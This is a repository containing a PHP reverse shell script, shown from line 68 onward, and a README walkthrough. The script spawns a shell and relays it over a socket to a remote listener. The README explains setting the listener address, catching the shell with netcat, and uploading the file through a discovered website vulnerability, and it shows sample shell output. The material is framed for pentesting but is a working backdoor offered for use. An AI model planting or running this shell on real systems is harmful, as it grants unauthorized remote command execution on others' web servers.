├── PHP-Reverse-Shell.php └── README.md /PHP-Reverse-Shell.php: -------------------------------------------------------------------------------- 1 | ["pipe", "r"], // stdin 68 | 1 => ["pipe", "w"], // stdout 69 | 2 => ["pipe", "w"] // stderr 70 | ]; 71 | 72 | // Spawn the shell process 73 | $process = proc_open($shell, $descriptorspec, $pipes); 74 | if (!is_resource($process)) { 75 | printit("ERROR: Can't spawn shell"); 76 | exit(1); 77 | } 78 | 79 | // Set the streams to non-blocking mode 80 | foreach ($pipes as $pipe) { 81 | stream_set_blocking($pipe, 0); 82 | } 83 | stream_set_blocking($sock, 0); 84 | 85 | printit("Successfully opened reverse shell to $ip:$port"); 86 | 87 | // Main loop to handle communication 88 | while (1) { 89 | if (feof($sock)) { 90 | printit("ERROR: Shell connection terminated"); 91 | break; 92 | } 93 | if (feof($pipes[1])) { 94 | printit("ERROR: Shell process terminated"); 95 | break; 96 | } 97 | 98 | $read_a = [$sock, $pipes[1], $pipes[2]]; 99 | $num_changed_sockets = stream_select($read_a, $write_a = null, $error_a = null, null); 100 | 101 | if ($num_changed_sockets === false) { 102 | printit("ERROR: stream_select failed"); 103 | break; 104 | } 105 | 106 | if (in_array($sock, $read_a)) { 107 | $input = fread($sock, $chunk_size); 108 | fwrite($pipes[0], $input); 109 | } 110 | 111 | if (in_array($pipes[1], $read_a)) { 112 | $output = fread($pipes[1], $chunk_size); 113 | fwrite($sock, $output); 114 | } 115 | 116 | if (in_array($pipes[2], $read_a)) { 117 | $error_output = fread($pipes[2], $chunk_size); 118 | fwrite($sock, $error_output); 119 | } 120 | } 121 | 122 | // Clean up 123 | fclose($sock); 124 | foreach ($pipes as $pipe) { 125 | fclose($pipe); 126 | } 127 | proc_close($process); 128 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Walk Through 2 | - [x] **Modify the source** 3 | - To prevent someone 
else from abusing your backdoor – a nightmare scenario while pentesting – hard-code your own listener's address and port in the script, so that anyone who happens to request the uploaded file only ever sends a shell back to you, and delete the file from the target as soon as you no longer need it. Edit the following lines of php-reverse-shell.php (the file is named PHP-Reverse-Shell.php in this repository):
4 | ______________
5 | | Variable | Default | Personal? |
6 | | ------------- |:----------------------:| -------------------------------:|
7 | | $ip | __127.0.0.1__ | Edit __line 7__ |
8 | | $port | __1234__ | Edit __line 8__ |
9 | ______________
10 |
11 | - [x] **Get Ready to catch the reverse shell**
12 | - Start a TCP listener on a host and port that the web server can reach, and set `$ip` to that host's address as seen from the web server (the default 127.0.0.1 only works if the listener runs on the web server itself). Use the same port here as you specified in the script (1234 in this example):
13 | ```
14 | $ nc -v -n -l -p 1234
15 | ```
16 | - [x] **Upload and Run the script**
17 | - Using whatever vulnerability you’ve discovered in the website, upload php-reverse-shell.php. Run the script simply by browsing to the newly uploaded file in your web browser, using exactly the file name you uploaded it under (the path is case-sensitive on case-sensitive filesystems). NB: You won’t see any output on the web page; the request just hangs for as long as the shell session is open, because the script only returns once the connection or the shell process has been closed:
18 | ```
19 | http://somesite/php-reverse-shell.php
20 | ```
21 | - [x] **Enjoy your new shell**
22 | - If all went well, the web server should have thrown back a shell to your netcat listener. Some useful commands such as w, uname -a, id and pwd are run automatically for you. Note that the shell runs with the web server's privileges (uid=81(apache) in the example below), not as root:
23 | ```
24 | $ nc -v -n -l -p 1234
25 | listening on [any] 1234 ...
26 | connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 58012
27 | Linux somehost 2.6.19-gentoo-r5 #1 SMP PREEMPT Sun Apr 1 16:49:38 BST 2007 x86_64 AMD Athlon(tm) 64 X2 Dual Core Processor 4200+ AuthenticAMD GNU/Linux
28 | 16:59:28 up 39 days, 19:54, 2 users, load average: 0.18, 0.13, 0.10
29 | USER TTY LOGIN@ IDLE JCPU PCPU WHAT
30 | root :0 19May07 ?xdm? 5:10m 0.01s /bin/sh
31 | uid=81(apache) gid=81(apache) groups=81(apache)
32 | sh: no job control in this shell
33 | sh-3.2$
34 | ```
35 | --------------------------------------------------------------------------------